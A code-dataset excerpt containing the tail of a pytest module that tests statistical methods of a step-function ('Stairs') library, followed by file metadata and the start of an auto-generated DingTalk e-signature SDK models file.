timestamp(2020, 1, 12, date_func=date_func),
timestamp(2020, 1, 13, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 15, date_func=date_func),
timestamp(2020, 1, 18, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 20, 12, date_func=date_func),
timestamp(2020, 1, 21, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 23, date_func=date_func),
timestamp(2020, 1, 23, 12, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 27, date_func=date_func),
timestamp(2020, 1, 29, 12, date_func=date_func),
-1,
)
return int_seq
def s4(date_func): # boolean
int_seq = Stairs(initial_value=0)
int_seq.layer(
timestamp(2020, 1, 9, date_func=date_func),
timestamp(2020, 1, 29, date_func=date_func),
1,
)
int_seq.layer(
timestamp(2020, 1, 10, 12, date_func=date_func),
timestamp(2020, 1, 12, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 12, 12, date_func=date_func),
timestamp(2020, 1, 13, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 20, date_func=date_func),
timestamp(2020, 1, 23, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 26, date_func=date_func),
timestamp(2020, 1, 26, 12, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 27, date_func=date_func),
timestamp(2020, 1, 28, 12, date_func=date_func),
-1,
)
return int_seq
@pytest.fixture
def s1_fix():
return s1()
@pytest.fixture
def s2_fix():
return s2()
@pytest.fixture
def s3_fix():
return s3()
@pytest.fixture
def s4_fix():
return s4()
def test_max_dates_1(date_func):
assert s1(date_func).max() == 4.5, "Expected maximum to be 4.5"
def test_max_dates_2(date_func):
assert (
s1(date_func).agg("max", (None, timestamp(2020, 1, 2, date_func=date_func)))
== 2
), "Expected maximum to be 2"
def test_max_dates_3(date_func):
assert (
s1(date_func).agg("max", (timestamp(2020, 1, 5, 12, date_func=date_func), None))
== 2
), "Expected maximum to be 2"
def test_max_dates_4(date_func):
assert (
s1(date_func).agg(
"max",
(
timestamp(2020, 1, 8, date_func=date_func),
timestamp(2020, 1, 9, date_func=date_func),
),
)
== -0.5
), "Expected maximum to be -0.5"
def test_min_dates_1(date_func):
assert s1(date_func).min() == -0.5, "Expected minimum to be -0.5"
def test_min_dates_2(date_func):
assert (
s1(date_func).agg("min", (None, timestamp(2020, 1, 4, date_func=date_func)))
== 0
), "Expected minimum to be 0"
def test_min_dates_3(date_func):
assert (
s1(date_func).agg(
"min", (timestamp(2020, 1, 10, 12, date_func=date_func), None)
)
== 0
), "Expected minimum to be 0"
def test_min_dates_4(date_func):
assert (
s1(date_func).agg(
"min",
(
timestamp(2020, 1, 4, date_func=date_func),
timestamp(2020, 1, 4, 12, date_func=date_func),
),
)
== 4.5
), "Expected minimum to be 4.5"
def test_mode_dates_1(date_func):
assert s1(date_func).mode() == -0.5, "Expected mode to be -0.5"
def test_mode_dates_2(date_func):
assert (
s1(date_func).agg("mode", (None, timestamp(2020, 1, 4, date_func=date_func)))
== 2
), "Expected mode to be 2"
def test_mode_dates_3(date_func):
assert (
s1(date_func).agg("mode", (timestamp(2019, 12, 27, date_func=date_func), None))
== 0
), "Expected mode to be 0"
def test_mode_dates_4(date_func):
assert (
s1(date_func).agg(
"mode",
(
timestamp(2020, 1, 4, 12, date_func=date_func),
timestamp(2020, 1, 6, 12, date_func=date_func),
),
)
== 2
), "Expected mode to be 2"
def test_median_dates_1(date_func):
assert s1(date_func).median() == 2, "Expected median to be 2"
def test_median_dates_2(date_func):
assert (
s1(date_func).agg("median", (None, timestamp(2020, 1, 17, date_func=date_func)))
== 0
), "Expected median to be 0"
def test_median_dates_3(date_func):
assert (
s1(date_func).agg("median", (timestamp(2020, 1, 3, date_func=date_func), None))
== -0.5
), "Expected median to be -0.5"
def test_median_dates_4(date_func):
assert (
s1(date_func).agg(
"median",
(
timestamp(2020, 1, 4, 12, date_func=date_func),
timestamp(2020, 1, 6, 12, date_func=date_func),
),
)
== 2
), "Expected median to be 2"
def test_mean_dates_1(date_func):
assert abs(s1(date_func).mean() - 13 / 9) <= 0.00001, "Expected mean to be 13/9"
def test_mean_dates_2(date_func):
assert (
s1(date_func).agg("mean", (None, timestamp(2020, 1, 6, date_func=date_func)))
== 3
), "Expected mean to be 3"
def test_mean_dates_3(date_func):
assert (
s1(date_func).agg("mean", (timestamp(2020, 1, 4, date_func=date_func), None))
== 0.75
), "Expected mean to be 0.75"
def test_mean_dates_4(date_func):
assert (
s1(date_func).agg(
"mean",
(
timestamp(2020, 1, 4, date_func=date_func),
timestamp(2020, 1, 8, date_func=date_func),
),
)
== 1.375
), "Expected mean to be 1.375"
def test_integral_dates_1(date_func):
assert (
s1(date_func).integral() / pd.Timedelta("1 D") == 13
), "Expected integral to be 13 days"
def test_integral_dates_2(date_func):
assert (
s1(date_func).agg(
"integral", (None, timestamp(2020, 1, 6, date_func=date_func))
)
/ pd.Timedelta("1 D")
== 15
), "Expected integral to be 15 days"
def test_integral_dates_3(date_func):
assert (
s1(date_func).agg(
"integral", (timestamp(2020, 1, 4, date_func=date_func), None)
)
/ pd.Timedelta("1 H")
== 108
), "Expected integral to be 108 hours"
def test_integral_dates_4(date_func):
assert (
s1(date_func).agg(
"integral",
(
timestamp(2020, 1, 4, date_func=date_func),
timestamp(2020, 1, 8, date_func=date_func),
),
)
/ pd.Timedelta("1 H")
== 132
), "Expected integral to be 132 hours"
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st1(pts))
# = 3.8580225122881124
# low, high = timestamp(2019,12,30, date_func=date_func), timestamp(2020,1,8,16, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st1(pts))
# = 3.501189060642099
# low, high = timestamp(2020,1,2, date_func=date_func), timestamp(2020,1,11,3, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st1(pts))
# = 3.971476824920255
@pytest.mark.parametrize(
"bounds, expected",
[
((), 3.8580225122881124),
(((2019, 12, 30), (2020, 1, 8, 16)), 3.501189060642099),
(((2020, 1, 2), (2020, 1, 11, 3)), 3.971476824920255),
],
)
def test_s1_var(date_func, bounds, expected):
bounds2 = [timestamp(*args, date_func=date_func) for args in bounds]
if len(bounds2) > 0:
bounds2 = [bounds2]
assert np.isclose(s1(date_func).agg("var", *bounds2), expected, atol=0.00001)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st2(pts))
# = 8.068647476524724
# low, high = timestamp(2019,12,30, date_func=date_func), timestamp(2020,1,8,16, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st2(pts))
# = 4.283962544589773
# low, high = timestamp(2020,1,2, date_func=date_func), timestamp(2020,1,11,3, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st2(pts))
# = 6.9166823043723
@pytest.mark.parametrize(
"bounds, expected",
[
((), 8.068647476524724),
(((2019, 12, 30), (2020, 1, 8, 16)), 4.283962544589773),
(((2020, 1, 2), (2020, 1, 11, 3)), 6.9166823043723),
],
)
def test_s2_var(date_func, bounds, expected):
bounds = [timestamp(*args, date_func=date_func) for args in bounds]
if len(bounds) > 0:
bounds = [bounds]
assert np.isclose(s2(date_func).agg("var", *bounds), expected, atol=0.00001)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st1(pts))
# = 1.9641849485952467
# low, high = timestamp(2019,12,30, date_func=date_func), timestamp(2020,1,8,16, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st1(pts))
# = 1.871146456224659
# low, high = timestamp(2020,1,2, date_func=date_func), timestamp(2020,1,11,3, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st1(pts))
# = 1.9928564486485862
@pytest.mark.parametrize(
"bounds, expected",
[
((), 1.9641849485952467),
(((2019, 12, 30), (2020, 1, 8, 16)), 1.871146456224659),
(((2020, 1, 2), (2020, 1, 11, 3)), 1.9928564486485862),
],
)
def test_s1_std(date_func, bounds, expected):
bounds = [timestamp(*args, date_func=date_func) for args in bounds]
if len(bounds) > 0:
bounds = [bounds]
assert np.isclose(s1(date_func).agg("std", *bounds), expected, atol=0.00001)
# low, high = (2020,1,1), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st2(pts))
# = 2.840536476886844
# low, high = timestamp(2019,12,30, date_func=date_func), timestamp(2020,1,8,16, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st2(pts))
# = 2.0697735491086395
# low, high = timestamp(2020,1,2, date_func=date_func), timestamp(2020,1,11,3, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st2(pts))
# = 2.6299586126728878
@pytest.mark.parametrize(
"bounds, expected",
[
((), 2.840536476886844),
(
((2019, 12, 30), (2020, 1, 8, 16)),
2.0697735491086395,
),
(((2020, 1, 2), (2020, 1, 11, 3)), 2.6299586126728878),
],
)
def test_s2_std(date_func, bounds, expected):
bounds = [timestamp(*args, date_func=date_func) for args in bounds]
if len(bounds) > 0:
bounds = [bounds]
assert np.isclose(s2(date_func).agg("std", *bounds), expected, atol=0.00001)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st1(pts1), st1(pts2))[0,1]
# = 0.7242066313374523
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st1(pts1), st1(pts2))[0,1]
# = -0.4564262197588511
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.corrcoef(st1(pts1), st1.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = 0.2145983282751396
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": [2020, 1, 1],
"upper": [2020, 1, 10],
"lag": pd.Timedelta(1, unit="D"),
},
0.7242066313374523,
),
(
{
"lower": [2020, 1, 1],
"upper": [2020, 1, 8],
"lag": pd.Timedelta(2, unit="D"),
},
-0.4564262197588511,
),
(
{
"lower": [2020, 1, 1],
"upper": [2020, 1, 8],
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
0.2145983282751396,
),
],
)
def test_s1_autocorr(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s1(date_func).corr(s1(date_func), **new_kwargs),
expected,
atol=0.00001,
)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st2(pts1), st2(pts2))[0,1]
# = 0.41564870493583517
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st2(pts1), st2(pts2))[0,1]
# = -0.1856362783824296
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.corrcoef(st2(pts1), st2.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = -0.24047807541603636
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 10),
"lag": pd.Timedelta(1, unit="D"),
},
0.41564870493583517,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
},
-0.1856362783824296,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
-0.24047807541603636,
),
],
)
def test_s2_autocorr(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s2(date_func).corr(s2(date_func), **new_kwargs), expected, atol=0.00001
)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st1(pts1), st2(pts2))[0,1]
# = -0.5504768716400756
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st1(pts1), st2(pts2))[0,1]
# = -0.869050905054203
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.corrcoef(st1(pts1), st2.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = -0.962531150106436
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 10),
"lag": pd.Timedelta(1, unit="D"),
},
-0.5504768716400756,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
},
-0.869050905054203,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
-0.962531150106436,
),
],
)
def test_crosscorr(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s1(date_func).corr(s2(date_func), **new_kwargs), expected, atol=0.00001
)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.cov(st1(pts1), st1(pts2))[0,1]
# = 2.9296901561636464
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.cov(st1(pts1), st1(pts2))[0,1]
# = -1.2499884258990304
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.cov(st1(pts1), st1.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = 0.892856552342196
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 10),
"lag": pd.Timedelta(1, unit="D"),
},
2.9296901561636464,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
},
-1.2499884258990304,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
0.892856552342196,
),
],
)
def test_s1_autocov(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s1(date_func).cov(s1(date_func), **new_kwargs), expected, atol=0.00001
)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs + 1)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs + 1)]
# np.cov(st2(pts1), st2(pts2))[0,1]
# = 2.903313715908994
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, 2*(total_secs - lag_secs) + 1)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, 2*(total_secs - lag_secs) + 1)]
# np.cov(st2(pts1), st2(pts2))[0,1]
# = -0.5850255035016916
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs + 1)]
# np.cov(st2(pts1), st2.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = -1.2321516853124157
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 10),
"lag": pd.Timedelta(1, unit="D"),
},
2.903313715908994,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
},
-0.5850255035016916,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
-1.2321516853124157,
),
],
)
def test_s2_autocov(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s2(date_func).cov(s2(date_func), **new_kwargs), expected, atol=0.0001
)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs + 1)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs + 1)]
# np.cov(st1(pts1), st2(pts2))[0,1]
# = -2.9980440069170653
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, 2*(total_secs - lag_secs) + 1)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, 2*(total_secs - lag_secs) + 1)]
# np.cov(st1(pts1), st2(pts2))[0,1]
# = -1.8000478009074565
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs + 1)]
# np.cov(st1(pts1), st2.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = -5.357139018807952
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 10),
"lag": pd.Timedelta(1, unit="D"),
},
-2.9980440069170653,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
},
-1.8000478009074565,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
-5.357139018807952,
),
],
)
def test_crosscov(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s1(date_func).cov(s2(date_func), **new_kwargs), expected, atol=0.0001
)
def test_integral_overflow():
with pytest.raises(OverflowError):
s = (
Stairs()
.layer(pd.Timestamp("1980"), pd.Timestamp("2050"), 5000)
.layer(pd.Timestamp("1990"), pd.Timestamp("2060"), 4000)
)
s.integral()
def test_mean_no_overflow():
s = (
Stairs()
.layer(pd.Timestamp("1980"), pd.Timestamp("2050"), 5000)
.layer(pd.Timestamp("1990"), pd.Timestamp("2060"), 4000)
)
s.mean()
| 32.907388 | 122 | 0.587023 | 4,465 | 31,624 | 3.986338 | 0.050392 | 0.163605 | 0.094387 | 0.12585 | 0.841508 | 0.815832 | 0.808023 | 0.787516 | 0.753132 | 0.719085 | 0 | 0.117625 | 0.248609 | 31,624 | 960 | 123 | 32.941667 | 0.631428 | 0.363585 | 0 | 0.455538 | 1 | 0 | 0.080094 | 0 | 0 | 0 | 0 | 0.001042 | 0.059282 | 1 | 0.074883 | false | 0 | 0.00936 | 0.00624 | 0.112324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c7c78714528a41eff27d1e42d0c36753d94f565a | 117,678 | py | Python | dingtalk/python/alibabacloud_dingtalk/esign_2_0/models.py | yndu13/dingtalk-sdk | 700fb7bb49c4d3167f84afc5fcb5e7aa5a09735f | [
"Apache-2.0"
] | null | null | null | dingtalk/python/alibabacloud_dingtalk/esign_2_0/models.py | yndu13/dingtalk-sdk | 700fb7bb49c4d3167f84afc5fcb5e7aa5a09735f | [
"Apache-2.0"
] | null | null | null | dingtalk/python/alibabacloud_dingtalk/esign_2_0/models.py | yndu13/dingtalk-sdk | 700fb7bb49c4d3167f84afc5fcb5e7aa5a09735f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
from typing import Dict, List
class CreateProcessHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class CreateProcessRequestFiles(TeaModel):
def __init__(
self,
file_id: str = None,
file_type: int = None,
file_name: str = None,
):
self.file_id = file_id
self.file_type = file_type
self.file_name = file_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.file_type is not None:
result['fileType'] = self.file_type
if self.file_name is not None:
result['fileName'] = self.file_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('fileType') is not None:
self.file_type = m.get('fileType')
if m.get('fileName') is not None:
self.file_name = m.get('fileName')
return self
class CreateProcessRequestParticipants(TeaModel):
def __init__(
self,
sign_requirements: str = None,
sign_order: int = None,
account_type: str = None,
account: str = None,
ding_corp_id: str = None,
user_id: str = None,
account_name: str = None,
org_name: str = None,
):
self.sign_requirements = sign_requirements
self.sign_order = sign_order
self.account_type = account_type
self.account = account
self.ding_corp_id = ding_corp_id
self.user_id = user_id
self.account_name = account_name
self.org_name = org_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.sign_requirements is not None:
result['signRequirements'] = self.sign_requirements
if self.sign_order is not None:
result['signOrder'] = self.sign_order
if self.account_type is not None:
result['accountType'] = self.account_type
if self.account is not None:
result['account'] = self.account
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.user_id is not None:
result['userId'] = self.user_id
if self.account_name is not None:
result['accountName'] = self.account_name
if self.org_name is not None:
result['orgName'] = self.org_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('signRequirements') is not None:
self.sign_requirements = m.get('signRequirements')
if m.get('signOrder') is not None:
self.sign_order = m.get('signOrder')
if m.get('accountType') is not None:
self.account_type = m.get('accountType')
if m.get('account') is not None:
self.account = m.get('account')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('accountName') is not None:
self.account_name = m.get('accountName')
if m.get('orgName') is not None:
self.org_name = m.get('orgName')
return self
class CreateProcessRequestCcs(TeaModel):
def __init__(
self,
account_type: str = None,
account: str = None,
ding_corp_id: str = None,
user_id: str = None,
account_name: str = None,
org_name: str = None,
):
self.account_type = account_type
self.account = account
self.ding_corp_id = ding_corp_id
self.user_id = user_id
self.account_name = account_name
self.org_name = org_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.account_type is not None:
result['accountType'] = self.account_type
if self.account is not None:
result['account'] = self.account
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.user_id is not None:
result['userId'] = self.user_id
if self.account_name is not None:
